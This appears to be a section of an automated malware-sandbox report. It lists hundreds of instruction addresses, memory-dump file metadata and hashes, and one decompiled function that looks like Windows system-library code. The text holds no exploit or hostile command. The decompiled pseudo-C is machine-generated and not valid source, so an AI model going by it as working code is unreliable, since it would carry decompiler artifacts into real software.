                                                0x009587b5
                                                0x0093d71f
                                                0x0093d71f
                                                0x0093d727
                                                0x0093d735
                                                0x0093d735
                                                0x0093d737
                                                0x0093d74b
                                                0x0093d769
                                                0x0093d7a5
                                                0x0093d7af
                                                0x0093d7b3
                                                0x009587de
                                                0x009587e4
                                                0x009587ef
                                                0x009587fc
                                                0x009587fe
                                                0x00958800
                                                0x00958807
                                                0x0093d7ed
                                                0x0093d7f4
                                                0x0095884e
                                                0x0095884e
                                                0x0093d801
                                                0x0095885d
                                                0x0095885d
                                                0x0093d80e
                                                0x00958869
                                                0x00958869
                                                0x0093d81a
                                                0x009483e6
                                                0x00000000
                                                0x0093d820
                                                0x0093d820
                                                0x0093d826
                                                0x009433a4
                                                0x009433a7
                                                0x0093d82e
                                                0x0093d837
                                                0x0093d83b
                                                0x009433b2
                                                0x009433b2
                                                0x009433b5
                                                0x009433be
                                                0x009433c4
                                                0x009433c7
                                                0x009433cf
                                                0x00958884
                                                0x00958884
                                                0x00958886
                                                0x0095888c
                                                0x00958892
                                                0x00000000
                                                0x00958892
                                                0x009433d7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009433dd
                                                0x0093d841
                                                0x0093d848
                                                0x0093d84e
                                                0x009588a4
                                                0x00000000
                                                0x00000000
                                                0x009588aa
                                                0x0093dc8b
                                                0x0093dc91
                                                0x00958d7c
                                                0x00958d7c
                                                0x0093dc9d
                                                0x00958d8c
                                                0x00958da5
                                                0x00958da5
                                                0x00958d8c
                                                0x0093dca9
                                                0x0093dcb1
                                                0x0093dcbe
                                                0x0093dccb
                                                0x0093dcd8
                                                0x0093dce5
                                                0x0093dcf2
                                                0x0093dcfd
                                                0x00943534
                                                0x00943542
                                                0x00943542
                                                0x00943534
                                                0x0093dd15
                                                0x0093dd27
                                                0x0093dd27
                                                0x0093dd38
                                                0x0093dd3a
                                                0x00000000
                                                0x0093dd3a
                                                0x0093d854
                                                0x0093d85a
                                                0x009433e2
                                                0x009433e4
                                                0x0093d871
                                                0x0093d877
                                                0x009433ef
                                                0x00943402
                                                0x00943406
                                                0x00000000
                                                0x00000000
                                                0x00943430
                                                0x00943434
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0093d87d
                                                0x0093d87d
                                                0x0093d883
                                                0x0093d88a
                                                0x0093d890
                                                0x009588e2
                                                0x0093d896
                                                0x0093d898
                                                0x0093d8be
                                                0x009588e8
                                                0x009588e8
                                                0x009588e8
                                                0x0093d898
                                                0x0093d8c2
                                                0x0093d8d0
                                                0x0093d8d0
                                                0x00000000
                                                0x0093d8c4
                                                0x0093d8c4
                                                0x0093d8ca
                                                0x009588f4
                                                0x009588f7
                                                0x0093d8d2
                                                0x0093d8e0
                                                0x0093d923
                                                0x0093d92b
                                                0x00943441
                                                0x00000000
                                                0x00000000
                                                0x00943447
                                                0x00000000
                                                0x0093d931
                                                0x0093d937
                                                0x0093d939
                                                0x0093d93f
                                                0x0093d945
                                                0x0093d95d
                                                0x0093d965
                                                0x0094345e
                                                0x00943471
                                                0x00943471
                                                0x0094345e
                                                0x0093d96d
                                                0x00000000
                                                0x0093d973
                                                0x0093d973
                                                0x0093d97b
                                                0x00943481
                                                0x00958912
                                                0x00958925
                                                0x00958925
                                                0x00958912
                                                0x0094349b
                                                0x009434a1
                                                0x009434a7
                                                0x009434a7
                                                0x0093d984
                                                0x0093d987
                                                0x0093d98d
                                                0x009483a8
                                                0x009483af
                                                0x0095892f
                                                0x009483b5
                                                0x009483b5
                                                0x009483b5
                                                0x009483bd
                                                0x00000000
                                                0x009483c3
                                                0x0095893d
                                                0x00000000
                                                0x00958943
                                                0x00958943
                                                0x00958956
                                                0x0095895a
                                                0x00000000
                                                0x00000000
                                                0x00958966
                                                0x0095896c
                                                0x0095896c
                                                0x00000000
                                                0x00958966
                                                0x00000000
                                                0x0095893d
                                                0x0093d993
                                                0x0093d993
                                                0x0093d993
                                                0x0093d999
                                                0x0093d99f
                                                0x00942f3d
                                                0x00942f3d
                                                0x0093d9b9
                                                0x0093d9b9
                                                0x0093d9c1
                                                0x00942f44
                                                0x00942f44
                                                0x0093d9ed
                                                0x0093da19
                                                0x0093da4b
                                                0x0093da4f
                                                0x00942f51
                                                0x00000000
                                                0x00000000
                                                0x00942f5b
                                                0x00942f5d
                                                0x00942f5d
                                                0x00942f67
                                                0x00942f6d
                                                0x00942f73
                                                0x00942f79
                                                0x0095897a
                                                0x00958984
                                                0x0095898c
                                                0x00958994
                                                0x00958994
                                                0x0095899a
                                                0x009589a2
                                                0x009589a8
                                                0x00000000
                                                0x009589a8
                                                0x00958990
                                                0x00000000
                                                0x00000000
                                                0x00958992
                                                0x00000000
                                                0x00958992
                                                0x0095897c
                                                0x0095897c
                                                0x00000000
                                                0x00942f7f
                                                0x00942f7f
                                                0x00942f87
                                                0x00942f8d
                                                0x00942f94
                                                0x00942f94
                                                0x0093da70
                                                0x0093da77
                                                0x009483c8
                                                0x009483ce
                                                0x00000000
                                                0x009589cc
                                                0x009589da
                                                0x009589e6
                                                0x009589e7
                                                0x009589e8
                                                0x009589e9
                                                0x009589ef
                                                0x009589ff
                                                0x00958a0b
                                                0x00958a19
                                                0x00958a1f
                                                0x00958a2e
                                                0x00958a32
                                                0x00000000
                                                0x00000000
                                                0x00958a38
                                                0x00958a3e
                                                0x00958a44
                                                0x00958a4f
                                                0x00958a5d
                                                0x00958a60
                                                0x00958a6a
                                                0x0093da80
                                                0x0093da84
                                                0x00958b61
                                                0x00958b61
                                                0x0093da98
                                                0x00958b76
                                                0x00000000
                                                0x00000000
                                                0x00958b82
                                                0x00000000
                                                0x00000000
                                                0x00958b8a
                                                0x00958b8b
                                                0x00958b97
                                                0x00958b9e
                                                0x00958ba5
                                                0x00958bab
                                                0x00958bb1
                                                0x00958bb7
                                                0x00958bc2
                                                0x00958bc6
                                                0x00000000
                                                0x00000000
                                                0x00958bd2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0093da9e
                                                0x0093da9e
                                                0x0093daa4
                                                0x00958be8
                                                0x00000000
                                                0x00000000
                                                0x00958bf4
                                                0x0095877e
                                                0x0095877e
                                                0x00000000
                                                0x0095877e
                                                0x00958bfc
                                                0x00958bfd
                                                0x00958c09
                                                0x00958c10
                                                0x00958c17
                                                0x00958c1d
                                                0x00958c23
                                                0x00958c29
                                                0x00958c34
                                                0x00958c38
                                                0x00000000
                                                0x00000000
                                                0x00958c44
                                                0x00000000
                                                0x00000000
                                                0x00958bd8
                                                0x00958bd8
                                                0x00000000
                                                0x00958bd8
                                                0x0093daaa
                                                0x0093dab0
                                                0x0093dabc
                                                0x0093dac2
                                                0x0093dad0
                                                0x0093dada
                                                0x0093dae1
                                                0x0093daec
                                                0x0093daef
                                                0x0093daf5
                                                0x0093dafd
                                                0x0093db03
                                                0x0093db0a
                                                0x0093db15
                                                0x0093db15
                                                0x0093db21
                                                0x0093db24
                                                0x0093db2a
                                                0x009434b9
                                                0x00000000
                                                0x00000000
                                                0x009434cc
                                                0x00000000
                                                0x0093db30
                                                0x0093db30
                                                0x0093db30
                                                0x0093db32
                                                0x0093db38
                                                0x0093db3b
                                                0x0093db41
                                                0x009483f5
                                                0x009483f5
                                                0x0093db5e
                                                0x0093db5e
                                                0x0093db64
                                                0x0093db6a
                                                0x0093db78
                                                0x0093db8a
                                                0x0093db8f
                                                0x0093db97
                                                0x00958cf1
                                                0x0093db9d
                                                0x0093db9d
                                                0x0093dba6
                                                0x0093dbb2
                                                0x0093dbb6
                                                0x0093dbbf
                                                0x009434d9
                                                0x00948402
                                                0x009434df
                                                0x009434ec
                                                0x009434f1
                                                0x009434fa
                                                0x00943503
                                                0x00943503
                                                0x00943512
                                                0x00943521
                                                0x00958d0e
                                                0x00958d13
                                                0x00958d13
                                                0x00943527
                                                0x00943527
                                                0x009434d9
                                                0x0093dbcb
                                                0x0093dbd3
                                                0x00948410
                                                0x0093dbd9
                                                0x0093dbd9
                                                0x0093dbe6
                                                0x0093dbeb
                                                0x0093dbf4
                                                0x00942fa6
                                                0x00942fa6
                                                0x0093dc04
                                                0x0093dc11
                                                0x00958d2c
                                                0x00958d31
                                                0x00958d31
                                                0x0093dc17
                                                0x0093dc17
                                                0x0093dbd3
                                                0x0093dc1d
                                                0x0093dc2b
                                                0x0093dc30
                                                0x0093dc39
                                                0x00958d47
                                                0x00958d4c
                                                0x00958d4c
                                                0x0093dc3f
                                                0x0093dc47
                                                0x0093dc4d
                                                0x0093dc4f
                                                0x0093dc58
                                                0x0093dc5a
                                                0x0093dc68
                                                0x0093dc6d
                                                0x0093dc78
                                                0x00958d5c
                                                0x00958d61
                                                0x0093dc86
                                                0x0093dc86
                                                0x0093dc89
                                                0x0093dc89
                                                0x00000000
                                                0x0093db97
                                                0x0093db47
                                                0x0093db4f
                                                0x00000000
                                                0x00000000
                                                0x0093db5c
                                                0x00000000
                                                0x0093db5c
                                                0x00958c89
                                                0x00958cae
                                                0x00958cb2
                                                0x00000000
                                                0x00000000
                                                0x00958cbe
                                                0x00958cd5
                                                0x00958cd5
                                                0x00958ce0
                                                0x00958ce6
                                                0x00000000
                                                0x00958ce6
                                                0x00958c4c
                                                0x00958c52
                                                0x00000000
                                                0x00000000
                                                0x00958c5e
                                                0x00958c5f
                                                0x00958c65
                                                0x00958c6b
                                                0x00958c78
                                                0x00000000
                                                0x00000000
                                                0x00958c7e
                                                0x00000000
                                                0x00958c7e
                                                0x0093dab0
                                                0x0093da98
                                                0x00958a77
                                                0x00958aee
                                                0x00958aee
                                                0x00958af6
                                                0x00958af8
                                                0x00958af8
                                                0x00958b04
                                                0x00958b0b
                                                0x00958b12
                                                0x00958b13
                                                0x00958b19
                                                0x00958b1a
                                                0x00958b20
                                                0x00958b25
                                                0x00958b31
                                                0x00958b39
                                                0x00958b41
                                                0x00958b41
                                                0x00958b48
                                                0x00958b4e
                                                0x00958b56
                                                0x00000000
                                                0x00000000
                                                0x00958b5c
                                                0x00000000
                                                0x00958b48
                                                0x00958a7b
                                                0x00958a82
                                                0x00958a88
                                                0x00958a8e
                                                0x00958a8f
                                                0x00958a90
                                                0x00958a91
                                                0x00958a9d
                                                0x00958a9e
                                                0x00958aa6
                                                0x00958ab0
                                                0x00958ab7
                                                0x00958abd
                                                0x00958ac7
                                                0x00958acd
                                                0x00958ad3
                                                0x00958ad9
                                                0x00958ae4
                                                0x00958ae8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00958ae8
                                                0x00958a54
                                                0x00000000
                                                0x00000000
                                                0x00958a59
                                                0x00000000
                                                0x00958a59
                                                0x00958a46
                                                0x00958a46
                                                0x00000000
                                                0x00958a46
                                                0x009483ce
                                                0x0093da7d
                                                0x0093da7f
                                                0x00000000
                                                0x0093da7f
                                                0x00942f79
                                                0x0093da63
                                                0x0093da69
                                                0x00000000
                                                0x0093da69
                                                0x0093d9c7
                                                0x0093d9ce
                                                0x00000000
                                                0x00000000
                                                0x0093d9da
                                                0x009483ed
                                                0x00000000
                                                0x009483ed
                                                0x0093d9e0
                                                0x0093d9e5
                                                0x00000000
                                                0x00000000
                                                0x0093d9eb
                                                0x00000000
                                                0x0093d9eb
                                                0x0093d9aa
                                                0x00948813
                                                0x00948818
                                                0x00000000
                                                0x00000000
                                                0x0094881e
                                                0x00948824
                                                0x00000000
                                                0x00948824
                                                0x0093d9b6
                                                0x00000000
                                                0x0093d9b6
                                                0x0093d98d
                                                0x0093d96d
                                                0x0093d92b
                                                0x009588ff
                                                0x00000000
                                                0x00000000
                                                0x00958905
                                                0x00000000
                                                0x00958905
                                                0x00000000
                                                0x0093d8ca
                                                0x0093d8c2
                                                0x0093d877
                                                0x009588c9
                                                0x00000000
                                                0x009588cf
                                                0x009588cf
                                                0x009588d5
                                                0x00000000
                                                0x009588d5
                                                0x00000000
                                                0x009588c9
                                                0x0093d862
                                                0x00000000
                                                0x009588b4
                                                0x009588b4
                                                0x00000000
                                                0x009588b4
                                                0x0093d862
                                                0x00958877
                                                0x00000000
                                                0x0095887d
                                                0x0095887d
                                                0x00000000
                                                0x0095887d
                                                0x00000000
                                                0x00958877
                                                0x0093d82c
                                                0x0093d82c
                                                0x00000000
                                                0x0093d82c
                                                0x0093d81a
                                                0x0093d7bf
                                                0x00000000
                                                0x0093d7c5
                                                0x0093d7c9
                                                0x0093d7cb
                                                0x0093d7cb
                                                0x0093d7d5
                                                0x0093d7db
                                                0x0093d7e1
                                                0x0093d7e7
                                                0x00958814
                                                0x0095881e
                                                0x00958826
                                                0x0095882e
                                                0x0095882e
                                                0x00958834
                                                0x0095883c
                                                0x00958842
                                                0x00000000
                                                0x00958842
                                                0x0095882a
                                                0x00000000
                                                0x00000000
                                                0x0095882c
                                                0x00000000
                                                0x0095882c
                                                0x00958816
                                                0x00958816
                                                0x00000000
                                                0x00958816
                                                0x00000000
                                                0x0093d7e7
                                                0x0093d7bf
                                                0x0093d729
                                                0x0093d72f
                                                0x009587c2
                                                0x009587d6
                                                0x00000000
                                                0x009587d6
                                                0x009587c4
                                                0x009587c9
                                                0x00000000
                                                0x00000000
                                                0x009587cf
                                                0x00000000
                                                0x009587cf
                                                0x00000000
                                                0x0093d72f
                                                0x00943397
                                                0x00000000
                                                0x00943397
                                                0x0093d71d
                                                0x0093d71d
                                                0x00000000
                                                0x0093d71d
                                                0x00000000
                                                0x0094836d
                                                0x0095878e
                                                0x00958793
                                                0x00000000
                                                0x00000000
                                                0x00958795
                                                0x00000000
                                                0x00958795
                                                0x0095872d
                                                0x0095872d
                                                0x00000000
                                                0x0095872d
                                                0x0094834f
                                                0x00948357
                                                0x00948359
                                                0x00948359
                                                0x00000000
                                                0x00948357
                                                0x0094880c
                                                0x0094880c
                                                0x0093d702
                                                0x0093d70a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0093d70a
                                                0x00958758
                                                0x00958762
                                                0x00000000
                                                0x00958762
                                                0x0095875a
                                                0x00000000
                                                0x0095875a
                                                0x00958741
                                                0x00958741
                                                0x00000000
                                                0x00958741
                                                0x0094837c
                                                0x00948384
                                                0x00948386
                                                0x00948386
                                                0x0094838c
                                                0x00948394
                                                0x0093d6ec
                                                0x0093d6ec
                                                0x00000000
                                                0x0094839a
                                                0x00000000
                                                0x0094839a
                                                0x00948394
                                                0x009487fd
                                                0x009487fd
                                                0x0093d6d7
                                                0x0093d6df
                                                0x00000000
                                                0x0093d6e5
                                                0x0093d6e5
                                                0x00000000
                                                0x0093d6e5
                                                0x0093d6df
                                                0x0093d659
                                                0x0093d621
                                                0x0093d5c1
                                                0x0093d5c2
                                                0x0093d5ca
                                                0x0093d5cb
                                                0x0093d5d5
                                                0x00000000
                                                0x00000000
                                                0x0093d5db
                                                0x0093d5e1
                                                0x0093d5ea
                                                0x00958719
                                                0x00000000
                                                0x00000000
                                                0x0095871f
                                                0x00000000
                                                0x0095871f
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-3916222277
                                                • Opcode ID: 99094040bc5876c9e9affd7b37f374c492b94fd30d24f2a2dc19720e292c7861
                                                • Instruction ID: 7290500829843019aee30f176a842edb71fec41bdb32c72bfa95fce3181057d7
                                                • Opcode Fuzzy Hash: 99094040bc5876c9e9affd7b37f374c492b94fd30d24f2a2dc19720e292c7861
                                                • Instruction Fuzzy Hash: C7A259729012699FEF318F24CC91BEAB7B9BB05300F1444EAEA49A3251DB749EC4DF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009169FE, Relevance: 1.7, Strings: 1, Instructions: 437COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E009169FE(char* __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28, intOrPtr _a32, char _a36) {
				char _v5;
				char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				intOrPtr _v60;
				short _v62;
				char _v64;
				intOrPtr _v68;
				short _v70;
				char _v72;
				void* __ebx;
				void* __esi;
				void* _t197;
				intOrPtr _t199;
				unsigned int _t200;
				intOrPtr _t203;
				intOrPtr _t232;
				signed int _t237;
				short* _t240;
				signed int _t244;
				signed int _t269;
				intOrPtr _t275;
				signed char _t283;
				signed int _t286;
				void* _t287;
				signed int _t288;
				signed int _t289;
				intOrPtr _t290;
				signed int _t292;

				_t284 = __edx;
				_t270 = _a12;
				_v36 = _v36 | 0xffffffff;
				_v56 = _v56 | 0xffffffff;
				_v28 = _v28 | 0xffffffff;
				_t289 = 0;
				_v72 = 0;
				asm("stosd");
				_v12 = 0;
				asm("stosw");
				_v52 = 0;
				_v40 = 0;
				_v32 = 0;
				_v6 = 0;
				_v5 = 0;
				_v16 = 0;
				_v24 = 0;
				if(_t270 == 0) {
					L65:
					return 0xc000000d;
				}
				_t197 =  *_t270;
				if(_t197 == 0) {
					goto L65;
				}
				_t269 = _a8;
				if(_t269 == 0 ||  *((intOrPtr*)(_t197 + 4)) > 0) {
					goto L65;
				} else {
					if((_a4 & 0x00010000) != 0) {
						_v5 = 1;
					}
					if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) == _t289) {
						_t199 = 0;
					} else {
						_t199 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0xfbc))));
					}
					if(_t199 == _t289) {
						_t200 = 0;
					} else {
						_t200 =  *(_t199 + 0x20);
					}
					_v44 = _t200;
					_a8 = _t270;
					if(_v5 != 0 || (_t200 & 0x00000006) == 0) {
						L11:
						_v20 = _t289;
						_t203 = E008FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, 0x154);
						_v16 = _t203;
						if(_t203 == _t289) {
							return 0xc0000017;
						}
						if(_v5 != 0) {
							L14:
							_t290 = _a20;
							_t286 = 0;
							if(_t290 != 0) {
								if(_v5 != 0) {
									goto L15;
								}
								_a16 = 0;
								if(0 >=  *(_t290 + 4)) {
									goto L15;
								} else {
									goto L78;
								}
								while(1) {
									L78:
									_t270 =  *((intOrPtr*)(_t290 + 0x10)) + _t286;
									if(0 ==  *( *((intOrPtr*)(_t290 + 0x10)) + _t286)) {
										goto L83;
									}
									_v60 = _v16;
									_v64 = 0;
									_v62 = 0xaa;
									_t252 =  *((intOrPtr*)(_t290 + 0xc));
									if( *((intOrPtr*)(_t290 + 0xc)) == 0) {
										_t252 = _t269;
									}
									_t284 =  &_v64;
									if(E00916973(_t252, _t270,  &_v64) < 0) {
										goto L83;
									}
									_push(0);
									_t206 = E00916CC4( &_v36,  &_v64, _a8, _t269, 0,  &_v36, _v60);
									_v12 = _t206;
									if(_t206 < 0) {
										goto L41;
									}
									L83:
									_a16 = _a16 + 1;
									_t286 = _t286 + 6;
									if(_a16 >= ( *(_t290 + 4) & 0x0000ffff)) {
										goto L15;
									}
								}
							}
							L15:
							_t206 = _a4 & 0x00000020;
							_a16 = _t206;
							if(_t206 == 0) {
								L32:
								if((_a4 & 0x00000040) != 0) {
									L40:
									if(_v6 != 0) {
										if(_a8 == 0) {
											goto L41;
										}
										_t206 = E00931CAC(_t270, _t284,  *_a8, _t269, _v44 >> 0x00000002 & 1, _v52, _a12);
										_v12 = _t206;
										if(_t206 < 0 || _a16 == 0 || (_a4 & 0x00000010) == 0) {
											goto L41;
										} else {
											_push(0);
											_t206 = E00916CC4( &_v56, _t284, _a12, _t269, 0,  &_v56, _v68);
											_v12 = _t206;
											if(_t206 < 0) {
												goto L41;
											}
											if(_v28 < 0) {
												_v12 = E0091406E(_t269, _v48, 1,  &_v28);
											}
											if(_v12 < 0) {
												goto L41;
											} else {
												_t206 = _v28 * 0x1c;
												_t270 =  *((intOrPtr*)( *((intOrPtr*)(_t269 + 0x14)) + 0xc)) + _v28 * 0x1c;
												if(( *( *((intOrPtr*)( *((intOrPtr*)(_t269 + 0x14)) + 0xc)) + _v28 * 0x1c) & 0x00000006) == 0) {
													goto L41;
												}
												if(_v20 == 0) {
													L97:
													_t220 =  *((intOrPtr*)(_t269 + 0x1c));
													goto L98;
												} else {
													_t220 = _v24;
													if(_v24 != 0) {
														L98:
														_push(_a4);
														_v12 = E00989BC9(_t269, _t270, _t284, _t290, _a12, _t270, _t269, _t220);
														goto L41;
													}
													goto L97;
												}
											}
										}
									}
									goto L41;
								}
								if(_a36 != 0) {
									if(_v40 <= 0) {
										goto L34;
									}
									goto L40;
								}
								L34:
								_v68 = _v16 + 0xaa;
								_v72 = 0;
								_v70 = 0xaa;
								_t206 = E00916150(_t270, _t284,  &_v48, _t269);
								_v12 = _t206;
								if(_t206 < 0) {
									goto L41;
								}
								if(E00914010(_t270, _t284, _v48 & 0x0000ffff,  &_v72) == 0) {
									_v12 = 0xc0000001;
									goto L41;
								}
								_t206 = E0091406E(_t269, _v48, 1,  &_v28);
								_v12 = _t206;
								if(_t206 < 0) {
									goto L41;
								}
								_push(0);
								_t206 = E00916CC4( &_v56, _t284, _a8, _t269, 0,  &_v56, _v68);
								_v12 = _t206;
								if(_t206 >= 0 && _a16 != 0) {
									_t206 = _v28 * 0x1c;
									_t270 =  *((intOrPtr*)( *((intOrPtr*)(_t269 + 0x14)) + 0xc)) + _v28 * 0x1c;
									if(( *( *((intOrPtr*)( *((intOrPtr*)(_t269 + 0x14)) + 0xc)) + _v28 * 0x1c) & 0x00000006) != 0) {
										if(_v20 == 0) {
											L91:
											_t231 =  *((intOrPtr*)(_t269 + 0x1c));
											L92:
											_push(_a4);
											_t206 = E00989BC9(_t269, _t270, _t284, _t290, _a8, _t270, _t269, _t231);
											_v12 = _t206;
											if(_t206 >= 0) {
												goto L40;
											}
											goto L41;
										}
										_t231 = _v24;
										if(_v24 != 0) {
											goto L92;
										}
										goto L91;
									}
								}
								goto L40;
							}
							_t232 = _a24;
							_t290 = 0;
							if(_t232 == 0 ||  *((intOrPtr*)(_t232 + 4)) <= 0) {
								_t206 = _a28;
								if(_t206 == _t290 ||  *(_t206 + 4) <= _t290) {
									goto L32;
								} else {
									goto L20;
								}
							} else {
								L20:
								_v20 = _t206;
								if( *((char*)(_t206 + 8)) == 0) {
									_t275 = _a32;
									if(_t275 == _t290) {
										_t275 =  *((intOrPtr*)(_t269 + 0x20));
									}
								} else {
									_t275 =  *((intOrPtr*)(_t269 + 0x1c));
								}
								_v24 = _t275;
								_t270 = 0;
								_t287 = 0;
								if(0 <  *(_t206 + 4)) {
									do {
										_t234 =  *((intOrPtr*)(_t206 + 0x10)) + _t290;
										if(0 ==  *((intOrPtr*)( *((intOrPtr*)(_t206 + 0x10)) + _t290))) {
											goto L31;
										}
										_v60 = _v16;
										_v64 = 0;
										_v62 = 0xaa;
										if(E00916973(_t269, _t234,  &_v64) < 0) {
											goto L31;
										}
										_push(0);
										_t237 = E00916CC4( &_v36, _t284, _a8, _t269, 1,  &_v36, _v60);
										_v12 = _t237;
										if(_t237 >= 0 && (_a4 & 0x00000010) != 0) {
											_t240 =  *((intOrPtr*)(_v20 + 0x10)) + _t290;
											if( *_t240 != 2) {
												goto L31;
											}
											_t64 = _t240 + 4; // 0x49
											_t243 =  *_t64 * 0x1c +  *((intOrPtr*)( *((intOrPtr*)(_t269 + 0x14)) + 0xc));
											_t283 =  *( *_t64 * 0x1c +  *((intOrPtr*)( *((intOrPtr*)(_t269 + 0x14)) + 0xc))) & 0x0000ffff;
											if((_t283 & 0x00000007) == 0) {
												goto L31;
											}
											if((_t283 & 0x00000006) != 0) {
												_push(_a4);
												_t244 = E00989BC9(_t269, _t283, _t284, _t290, _a8, _t243, _t269, _v24);
												_v12 = _t244;
												if(_t244 >= 0) {
													goto L30;
												}
												goto L31;
											}
											L30:
											_v40 = _v40 + 1;
										}
										L31:
										_t206 = _v20;
										_t270 =  *(_t206 + 4) & 0x0000ffff;
										_t287 = _t287 + 1;
										_t290 = _t290 + 6;
									} while (_t287 < ( *(_t206 + 4) & 0x0000ffff));
								}
								goto L32;
							}
						}
						_t292 = _a16;
						_t288 = 0;
						if(_t292 != 0) {
							_a16 = 0;
							if(0 >=  *(_t292 + 4)) {
								goto L14;
							} else {
								goto L69;
							}
							while(1) {
								L69:
								_t270 =  *((intOrPtr*)(_t292 + 0x10)) + _t288;
								if(0 ==  *( *((intOrPtr*)(_t292 + 0x10)) + _t288)) {
									goto L74;
								}
								_v60 = _v16;
								_v64 = 0;
								_v62 = 0xaa;
								_t262 =  *((intOrPtr*)(_t292 + 0xc));
								if( *((intOrPtr*)(_t292 + 0xc)) == 0) {
									_t262 = _t269;
								}
								_t284 =  &_v64;
								if(E00916973(_t262, _t270,  &_v64) >= 0) {
									_push(0);
									_t206 = E00916CC4( &_v36,  &_v64, _a8, _t269, 0,  &_v36, _v60);
									_v12 = _t206;
									if(_t206 < 0) {
										goto L41;
									}
								}
								L74:
								_a16 = _a16 + 1;
								_t288 = _t288 + 6;
								if(_a16 >= ( *(_t292 + 4) & 0x0000ffff)) {
									goto L14;
								}
							}
						}
						goto L14;
					} else {
						_v52 = _t200 >> 0x10;
						_v6 = 1;
						_a8 =  &_v32;
						_t206 = E009170DC( &_v32, _t269, 0x19, _t289);
						_v12 = _t206;
						if(_t206 < _t289) {
							L41:
							if(_v32 != 0) {
								E0090419E(_t206, _t270, _v32);
							}
							if(_v16 != 0) {
								E008FE025(_t270,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v16);
							}
							return _v12;
						}
						_t289 = 0;
						goto L11;
					}
				}
			}










































                                                0x009169fe
                                                0x00916a06
                                                0x00916a09
                                                0x00916a0d
                                                0x00916a11
                                                0x00916a18
                                                0x00916a1c
                                                0x00916a23
                                                0x00916a24
                                                0x00916a27
                                                0x00916a29
                                                0x00916a2c
                                                0x00916a2f
                                                0x00916a32
                                                0x00916a36
                                                0x00916a3a
                                                0x00916a3d
                                                0x00916a42
                                                0x009320ef
                                                0x00000000
                                                0x009320ef
                                                0x00916a48
                                                0x00916a4c
                                                0x00000000
                                                0x00000000
                                                0x00916a52
                                                0x00916a57
                                                0x00000000
                                                0x00916a67
                                                0x00916a6e
                                                0x0092ff97
                                                0x0092ff97
                                                0x00916a80
                                                0x009320bc
                                                0x00916a86
                                                0x00916a92
                                                0x00916a92
                                                0x00916a96
                                                0x009320f9
                                                0x00916a9c
                                                0x00916a9c
                                                0x00916a9c
                                                0x00916aa3
                                                0x00916aa6
                                                0x00916aa9
                                                0x00916ab3
                                                0x00916ac6
                                                0x00916ac9
                                                0x00916ace
                                                0x00916ad3
                                                0x00000000
                                                0x0095c979
                                                0x00916add
                                                0x00916aec
                                                0x00916aec
                                                0x00916aef
                                                0x00916af3
                                                0x0095ca04
                                                0x00000000
                                                0x00000000
                                                0x0095ca0c
                                                0x0095ca13
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095ca19
                                                0x0095ca19
                                                0x0095ca1c
                                                0x0095ca24
                                                0x00000000
                                                0x00000000
                                                0x0095ca29
                                                0x0095ca2e
                                                0x0095ca37
                                                0x0095ca3b
                                                0x0095ca40
                                                0x0095ca42
                                                0x0095ca42
                                                0x0095ca44
                                                0x0095ca51
                                                0x00000000
                                                0x00000000
                                                0x0095ca53
                                                0x0095ca62
                                                0x0095ca67
                                                0x0095ca6c
                                                0x00000000
                                                0x00000000
                                                0x0095ca72
                                                0x0095ca76
                                                0x0095ca79
                                                0x0095ca7f
                                                0x00000000
                                                0x00000000
                                                0x0095ca85
                                                0x0095ca19
                                                0x00916af9
                                                0x00916afc
                                                0x00916aff
                                                0x00916b02
                                                0x00916be2
                                                0x00916be6
                                                0x00916c86
                                                0x00916c8a
                                                0x00931c14
                                                0x00000000
                                                0x00000000
                                                0x00931c32
                                                0x00931c37
                                                0x00931c3c
                                                0x00000000
                                                0x00931c56
                                                0x00931c56
                                                0x00931c65
                                                0x00931c6a
                                                0x00931c6f
                                                0x00000000
                                                0x00000000
                                                0x00931c7a
                                                0x0095caf0
                                                0x0095caf0
                                                0x00931c84
                                                0x00000000
                                                0x00931c8a
                                                0x00931c91
                                                0x00931c97
                                                0x00931c9c
                                                0x00000000
                                                0x00000000
                                                0x0095cafc
                                                0x0095cb05
                                                0x0095cb05
                                                0x00000000
                                                0x0095cafe
                                                0x0095cafe
                                                0x0095cb03
                                                0x0095cb08
                                                0x0095cb08
                                                0x0095cb16
                                                0x00000000
                                                0x0095cb16
                                                0x00000000
                                                0x0095cb03
                                                0x0095cafc
                                                0x00931c84
                                                0x00931c3c
                                                0x00000000
                                                0x00916c8a
                                                0x00916bf0
                                                0x0095caa8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095caae
                                                0x00916bf6
                                                0x00916bfe
                                                0x00916c03
                                                0x00916c0c
                                                0x00916c15
                                                0x00916c1a
                                                0x00916c1f
